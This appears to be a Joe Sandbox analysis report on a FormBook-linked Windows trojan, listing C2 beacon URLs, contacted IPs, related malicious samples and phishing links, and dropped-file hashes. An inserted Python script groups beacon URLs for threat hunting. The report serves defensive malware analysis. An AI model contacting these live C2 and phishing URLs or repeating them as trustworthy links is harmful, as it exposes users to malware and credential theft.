http://www.077551.xyz/4ogj/ | false | Avira URL Cloud: safe | unknown
http://www.w25dn.top/axxb/ | false | Avira URL Cloud: safe | unknown
http://www.114lala.net/ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.eoghenluire.com/i3r0/ | true | Avira URL Cloud: safe | unknown
http://www.w25dn.top/axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.g2m-os.com/42ua/ | false | Avira URL Cloud: safe | unknown
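The URL tables carry the report's second strong FormBook indicator. Every candidate C2 is a four-character lowercase path under the host, and the beacons carry one base64 blob parameter (TvpPfhGp) and one short token parameter (Y664G=SttDen986), with the same two parameter names on every domain; that is consistent with one decoded configuration rotating through its list of candidate C2 domains, most of which FormBook uses as decoys. Only eoghenluire.com and www.077551.xyz are marked malicious, and the "Avira URL Cloud: safe" verdicts on the other rows mean the URLs are unknown to that scanner, not that they are benign. The following Python is an added example, not part of the Joe Sandbox report, that extracts and groups such beacons from a list of URL strings. The URL list is a constructed subset copied from the tables above (plus three non-C2 strings for contrast); the regexes, the beacon/base/other labels and the helper names are assumptions of the example and not a published FormBook specification.

```python
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed subset of the URL strings the report extracted from memory dumps
# (copied from the URL tables above, plus three non-C2 strings for contrast).
URLS = [
    "http://www.n-ambu.com/2gp2/",
    "http://www.n-ambu.com/2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986",
    "http://www.eoghenluire.com/i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986",
    "http://www.077551.xyz/4ogj/",
    "http://www.w25dn.top/axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986",
    "http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI",  # cut short in the dump
    "https://duckduckgo.com/ac/?q=",
    "http://fedoraproject.org/",
    "https://cdn.jqueryscdns.net/jquery-3.7.1.min.js",
]

# Assumed shape of a FormBook-style beacon, derived from the rows above:
# /xxxx/ path of four lowercase alphanumerics, one base64 blob parameter and
# one short alphanumeric token parameter.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]+$")


def _decoded_len(blob):
    """Length of the base64-decoded blob, or None if it does not decode
    (the report shows at least one string cut short mid-blob)."""
    try:
        return len(base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True))
    except binascii.Error:
        return None


def classify(url):
    """Return (kind, details) with kind 'beacon', 'base' or 'other'."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return "other", {}
    details = {"host": parts.netloc.lower(), "path": parts.path}
    if not parts.query:
        return "base", details
    # Not parse_qsl: it turns '+' into a space and corrupts the base64 blob.
    pairs = [p.split("=", 1) for p in parts.query.split("&")]
    if len(pairs) not in (1, 2) or any(len(p) != 2 for p in pairs):
        return "other", {}
    blob_key, blob = pairs[0]
    if not B64_RE.match(blob):
        return "other", {}
    details.update(blob_key=blob_key, blob_len=len(blob), decoded_len=_decoded_len(blob),
                   token_key=None, token=None, partial=len(pairs) == 1)
    if len(pairs) == 2:
        token_key, token = pairs[1]
        if not TOKEN_RE.match(token):
            return "other", {}
        details.update(token_key=token_key, token=token)
    return "beacon", details


def group_beacons(urls):
    """Per host: the C2 path, number of beacons seen, parameter-name pairs used."""
    out = defaultdict(lambda: {"path": None, "beacons": 0, "keys": set()})
    for url in urls:
        kind, d = classify(url)
        if kind == "other":
            continue
        entry = out[d["host"]]
        entry["path"] = d["path"]
        if kind == "beacon":
            entry["beacons"] += 1
            entry["keys"].add((d["blob_key"], d["token_key"]))
    return dict(out)


def shared_campaign_keys(grouped):
    """Parameter-name pairs seen on more than one host. One pair across many
    hosts is the signature of one config rotating through its C2 list."""
    hosts_by_key = defaultdict(set)
    for host, entry in grouped.items():
        for key in entry["keys"]:
            hosts_by_key[key].add(host)
    return {k: sorted(h) for k, h in hosts_by_key.items() if len(h) > 1}


if __name__ == "__main__":
    grouped = group_beacons(URLS)
    for host, entry in sorted(grouped.items()):
        print(f"{host:24} path={entry['path']} beacons={entry['beacons']}")
    for key, hosts in shared_campaign_keys(grouped).items():
        print("shared parameter names", key, "across", hosts)
```

The blob is only base64-decoded to measure it; its content is encrypted by the payload and is not recoverable from the URL alone, so the grouping, not the decoding, is what ties the hosts together. Run the same classifier over proxy logs and the four-character path plus a shared parameter-name pair across otherwise unrelated domains is a usable hunting query even when every individual domain is still rated "safe".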
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://js.users.51.la/21879113.js | subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.jqueryscdns.net/jquery-3.7.1.min.js | subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://track.uc.cn/collect | subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://push.zhanzhang.baidu.com/push.js | subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003F9A000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003AEA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nginx.net/ | subst.exe, 00000004.00000002.4163884021.0000000004F4E000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000004A9E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fedoraproject.org/ | subst.exe, 00000004.00000002.4163884021.0000000004F4E000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000004A9E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI | subst.exe, 00000004.00000002.4163884021.0000000004DBC000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.000000000490C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js? | subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | subst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                                          http://www.rodotest2.proUJCHZIamnVz.exe, 00000007.00000002.4165384039.00000000056F7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarksubst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icosubst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://zz.bdstatic.com/linksubmit/push.jssubst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003F9A000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003AEA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.ecosia.org/newtab/subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jssubst.exe, 00000004.00000002.4166115589.0000000006160000.00000004.00000800.00020000.00000000.sdmp, subst.exe, 00000004.00000002.4163884021.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003958000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://f385xw.com/registersubst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000002.4163516814.0000000003634000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
154.23.7.170 | www.114lala.net | United States | 174 | COGENT-174US | false
162.240.81.18 | dudapolicarpo.online | United States | 46606 | UNIFIEDLAYER-AS-1US | false
35.244.172.47 | www.ajjmamlllqqq.xyz | United States | 15169 | GOOGLEUS | false
76.223.105.230 | eoghenluire.com | United States | 16509 | AMAZON-02US | true
217.160.0.119 | www.qrdinamicos.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
162.241.2.92 | vendasnaweb1.com | United States | 26337 | OIS1US | false
104.21.84.69 | www.077551.xyz | United States | 13335 | CLOUDFLARENETUS | true
185.106.178.60 | www.immedu.website | United Kingdom | 204212 | AS_LYREG3FR | false
38.47.232.185 | w25dn.top | United States | 174 | COGENT-174US | false
203.161.41.205 | www.shabygreen.top | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | false
74.208.236.38 | www.costmoon.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
46.30.211.38 | www.n-ambu.com | Denmark | 51468 | ONECOMDK | false
3.33.130.190 | rodotest2.pro | United States | 8987 | AMAZONEXPANSIONGB | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1466969
Start date and time: 2024-07-03 15:55:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 7RsDGpyOQk.exe (renamed because the original name is a hash value)
Original Sample Name: 24f58a84a8acf1b1e52fe60798e03b2e3b97d5f52628d7c40ffcc9b7937b9b12.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@16/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 57
• Number of non-executed functions: 268
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 7RsDGpyOQk.exe
Time | Type | Description
09:57:06 | API Interceptor | 10857004x Sleep call for process: subst.exe modified
Associated Sample Name / URL | Detection | Threat Name | Context

Match: 162.240.81.18
Att00173994.exe | malicious | FormBook | www.agoraeubebo.com/rs2o/
Att0027592.exe | malicious | FormBook | www.agoraeubebo.com/rs2o/
DHL_AWB#6078538091.exe | malicious | FormBook | www.agoraeubebo.com/rs2o/
Products volume.exe | malicious | FormBook | www.agoraeubebo.com/dzin/
AWB_NO_907853880911.exe | malicious | FormBook | www.agoraeubebo.com/rs2o/
Yemenittiskes.exe | malicious | FormBook, GuLoader | www.tintasmaiscor.com/a8pp/
DRAFT 99577590.exe | malicious | FormBook | www.upshercode.store/mjwv/
pp0fHVNbib.exe | malicious | FormBook, GuLoader | www.tintasmaiscor.com/a8pp/
ulACwpUCSU.exe | malicious | FormBook, GuLoader | www.tintasmaiscor.com/a8pp/
9hD6o07kwl.exe | malicious | FormBook | www.agoraeubebo.com/0so0/

Match: 76.223.105.230
PO454355 Pdf.exe | malicious | FormBook | www.eoghenluire.com/jtz4/
Quotation List Pdf.exe | malicious | FormBook | www.eoghenluire.com/jtz4/
AirWaybill_Document Pdf.exe | malicious | FormBook | www.eoghenluire.com/jtz4/
Salary raise.exe | malicious | FormBook | www.entendiendomedicare.com/as02/?s0=6fH45aDlVNhnOskbLi081Iw4Ly3eLp4Isu5/hutH1BnEEtPkP41V1tnnyJTSXQaokrqG&CZ=7nH0qrt
cca9sXT33VsAEdu.exe | malicious | FormBook | www.northshorehousekeeping.com/dy13/?mN90y=XTlUhvXJhbyUWpOWWaNoz0aeR9JzYBwn0yg9ap+UAGVJhiauFXpRE35hlQ/sGq3x2H4O&9rh=DxoDfzn8FrEX
http://ammsqassociates.com | malicious | Unknown | ammsqassociates.com/
HSBC Payment Advice.img.exe | malicious | FormBook | www.fpmfstudios.com/mw62/?hbMlVFRH=Ht7QvbxxwXXMOd758J7+YaVFoCi0nuG0BUx/t1FBqP+p2+4cGiHqFX99RZ4dAcA3ztoB7CsrMA==&Elr=gdm42bE8RhIx
Details of Your Etisalat Summary Bill for the Month of May 2024.exe | malicious | FormBook | www.micheleditrana.com/da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb
Maersk Arrival Notice ready for Bill of Lading 238591458-393747337-837473734-283473743.exe | malicious | FormBook | www.rmicompletesolutions.co.za/se62/?2d=2wNuFwDu9bztZ7BzYMKzLVyuL3Rhtsmkm4Agqz9YK3jSPVj+yfwnxWiBTecrEb1IVu+p&AR083x=8pA8X29xp
WvwNJkZ8jcQuUnb.exe | malicious | FormBook, PureLog Stealer | www.bryve.shop/cn26/?CTp0R=cvKXnTUHWxJHefS&tFQt-Vx=ltJ6th+sBJ9mv3UKwc87xh86lXmYOPMhi623J1YaD9g2Lu0dVgwxESNToeB20mxYNvkW
Associated Sample Name / URL | Detection | Threat Name | Context

Match: www.costmoon.com
SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | malicious | FormBook | 74.208.236.38

Match: pixie.porkbun.com
INVOICE - MV CNC BANGKOK - ST24PJ-278.exe | malicious | FormBook | 44.227.76.166
PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exe | malicious | FormBook | 44.227.76.166
MT103-746394.doc | malicious | FormBook | 44.227.65.245
SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | 44.227.65.245
PO TRO-1075 - TRO-1076 904504608468.pdf.exe | malicious | FormBook | 44.227.76.166
Eugg3yid0O.exe | malicious | FormBook | 44.227.76.166
Maersk Arrival Notice ready for Bill of Lading 238591458-393747337-837473734-283473743.exe | malicious | FormBook | 44.227.65.245
Purchase Order For Consumables Eltra 888363725_9645364782_1197653623_836652746_22994644.exe | malicious | FormBook | 44.227.76.166
UAyH98ukuA.exe | malicious | FormBook | 44.227.76.166
3PhhXne1YD.exe | malicious | FormBook | 44.227.76.166
Associated Sample Name / URL | Detection | Threat Name | Context

Match: ONEANDONE-ASBrauerstrasse48DE
4munRyMrBm.exe | malicious | AgentTesla | 74.208.5.2
RR1h1iO6W2.exe | malicious | FormBook | 217.160.223.34
SOA 020724.exe | malicious | FormBook | 217.160.0.85
http://www.doneck.com | malicious | Unknown | 217.160.0.83
HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | 74.208.46.171
Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | malicious | FormBook | 212.227.172.254
Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe | malicious | FormBook | 212.227.172.254
Att00173994.exe | malicious | FormBook | 217.76.156.252
https://supp-review9482.eu/ | malicious | Unknown | 212.227.67.33
Inquiry No PJO-4010574.exe | malicious | FormBook | 217.160.0.85

Match: UNIFIEDLAYER-AS-1US
TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exe | malicious | AgentTesla | 192.254.225.136
awb_shipping_post_02072024224782020031808174CN18020724000000224(991KB).vbs | malicious | GuLoader | 192.185.217.247
_Account Receipt.PDF.exe | malicious | AgentTesla | 192.185.143.105
PO-2024)bekotas.pdf.exe | malicious | AgentTesla | 108.167.140.123
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT | malicious | HTMLPhisher | 162.241.62.33
DHL_AWB 98776013276.xls | malicious | FormBook | 192.185.89.92
AWB 3609 961.pdf.scr.exe | malicious | AgentTesla | 192.185.143.105
Att00173994.exe | malicious | FormBook | 162.240.81.18
457525.xls | malicious | Unknown | 192.185.89.92
457525.xls | malicious | Unknown | 192.185.89.92

Match: OIS1US
https://1drv.ms/o/s!At-8sPpRzvxIqQDSUMWIAACun1sr?e=FTp3hr | malicious | HTMLPhisher | 162.241.71.126
Arch0000000000.msi | malicious | Metamorfo | 162.241.2.244
Proforma_Invoice.pif.exe | malicious | FormBook | 162.241.2.254
http://2424x2.site | malicious | Unknown | 162.241.71.126
ELMA _CO LLC_pdf.vbs | malicious | FormBook, GuLoader | 162.241.2.113
https://cbcd2024.com/agencia-de-viagens/ | malicious | Unknown | 162.241.2.193
https://m.morrissey-mmuptn7vfawopptn7vfawop.narymar.com/ | malicious | Unknown | 162.241.2.35
https://web.streamlinevrs.com/pmt_common/redirect/email_292045603.script?url=//lzKmqliM.ortopediajk.com.br/godsendd/ | malicious | Unknown | 162.241.203.125
Arrival Notice.bat.exe | malicious | FormBook | 162.241.2.254
Arrival Notice.bat.exe | malicious | FormBook | 162.241.2.254

Match: COGENT-174US
GA4vpVYBVP.exe | malicious | DBatLoader, FormBook | 206.233.240.73
GaTxCRa6li.exe | malicious | GuLoader | 38.153.61.199
file.exe | malicious | FormBook | 38.47.158.160
spc.elf | malicious | Mirai | 38.162.204.50
watchdog.elf | malicious | Mirai | 38.251.174.191
pKqvOdh3Sv.elf | malicious | Mirai, Moobot | 206.5.238.105
http://d.sogouad.vip/txt/black.txt | malicious | Unknown | 206.119.165.54
PO454355 Pdf.exe | malicious | FormBook | 38.47.232.185
hkLFB22XxS.exe | malicious | FormBook | 38.47.158.215
config.lnk.mal.lnk | malicious | CredGrabber, Meduza Stealer | 149.51.230.198

Match: AMAZON-02US
Quarantined Messages (1).zip | malicious | HTMLPhisher | 13.227.219.106
https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29t | malicious | HTMLPhisher | 18.245.31.89
https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2Bs0-2F4odRns7kSdvfqBhyqSbrYsnPmx4SeDwlRdlhHbM3UucitnipcwJ1gR7h8DzOIUWsvEslHUA8FsNTNWtsq3Q-2FU-2FPeBtGbo-2Fx3kgcXxAZuE-3DPmkq_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCQdFcL55956QetBM0U9iihLLCXzc7MWVFcQDUwnaU8PUgQFrTwK63nQhJu8ngVllYSJR-2BUamfX7Ej8Gpp4vMWsL8t65JTtpjdFVQ36IgP-2B2LxLYSj9SfdmLAt97TCVXHWn7xANKqYpl-2BYx09SetkszDOjJuUV9L9bqZ-2FbmClOsUrPLylG74RJ8zQAREr7-2BUktmlWKoc8C7oqqTOKv340mZnTc-2FztCVjFgPMm1Bz5lR5AptUVEvvSBboXVGluKKoNkkMFkS-2BmNybyD3Aa-2BX8UZ5s | malicious | HTMLPhisher | 108.156.39.24
RR1h1iO6W2.exe | malicious | FormBook | 18.138.110.70
https://lnkd.in/exwPeXjc | malicious | HTMLPhisher | 13.32.99.33
https://hr.economictimes.indiatimes.com/etl.php?url=https:**Ahr.economictimes.indiatimes.com*etl.php*url=**Ayrtdtrdtyuikmmoix.pages.dev**Aemail=bWphY2tzb25AdHFsLmNvbQ==__;Ly8vPy8vIz8!!HkjQSg!xM0xOkWiB4abX6VJj84K1M3pVXJBP_GNPKTGuCBQdGUHkKmAbpL4OU1gL4uMAa_niGNzFWaU4aO2SbOw3s8pm3wmWgo$ | malicious | Unknown | 52.209.249.92
https://u6071375.ct.sendgrid.net/ls/click?upn=u001.jNebCYco-2BJgBMGJDj1kJWP39IKixFvDeSBij1PLovvXT0hkMSWjEhuIEgwQ-2F309CwGFmoY6-2Bl45VLW7K9Sd8-2Fg-3D-3Dm1D8_bgsmQmhs-2BDkrnAcljUiGIti1-2F3303-2FliL2Lyr586-2FN9rAlBFKILfRyjObk6Iz5-2FtMSxC-2FhiWOZXbqnmzeZXBiy3CSpPIYxz2-2BTcFMtFX6z-2FFKaL9cuMNNsd9H8Soth9M-2BiGwIhw5kRyphke6a8RYyV0rtdDONsX7lNk6Cr796v-2FIJZ8nzBJ39o6b-2FDySakEM-2B9nvScrgUWzDogJp7LxfPQ-3D-3D | malicious | HTMLPhisher | 18.239.83.17
https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFhSZp6GshBFVdVLEzBsru52fhlDAZ8Q3OfCA-2F-2Bk2qB9l25yp_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZM3qYZS8WARR8FVyg-2FqvoINWytiD-2FheyMDzu6v-2BoRt5KWyPoztbWkeGPmxB3DyZYTb9a0dAMPLFunr2Ay3ayAFAAvKLYcNXJh5TbSbsyQLthHxBhJhxiFX8keWC7AD3Hw3SgmU-2Be6lkIQuq7tgnHL9CbCr8GEaIyKgtaL1D3uFR7kdAbCakzZIHLBzzIP6uu3b9lr3L70N6m-2FPL5vz2WpJ-2B4Z2WkXjdKV6CAWTeZlidHHDlZecGQIcrIqiWGF6jpeY-3D#Dsonya.buzzard@aggregate.com | malicious | Unknown | 34.252.40.201
5GOuTtZoQn.exe | malicious | LummaC, Poverty Stealer, SmokeLoader | 104.192.141.1
http://tucertificado.es | malicious | Unknown | 13.33.187.15
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\subst.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):114688
                                                          Entropy (8bit):0.9746603542602881
                                                          Encrypted:false
                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Process:C:\Users\user\Desktop\7RsDGpyOQk.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):270848
